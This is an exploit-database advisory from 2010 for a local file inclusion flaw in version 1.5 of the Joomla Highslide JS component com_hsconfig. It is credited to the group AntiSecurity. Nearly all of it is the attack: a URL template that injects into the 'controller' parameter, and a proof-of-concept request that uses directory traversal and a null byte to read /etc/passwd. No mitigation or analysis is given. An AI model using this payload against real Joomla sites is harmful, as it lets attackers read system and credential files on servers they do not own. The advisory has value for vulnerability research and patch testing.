Joomla Component Highslide JS com_hsconfig Local File Inclusion

2010-04-06T00:00:00
ID 1337DAY-ID-11651
Type zdt
Reporter AntiSecurity
Modified 2010-04-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================================
Joomla Component Highslide JS com_hsconfig Local File Inclusion Vulnerability
=============================================================================

===============================================================================================================
 
 
  [o] Joomla Component Highslide JS Local File Inclusion Vulnerability
  
       Software : com_hsconfig version 1.5
       Vendor   : http://www.joomlanook.com/
       Author   : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_hsconfig&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
 
 
===============================================================================================================





#  0day.today [2018-03-19]  #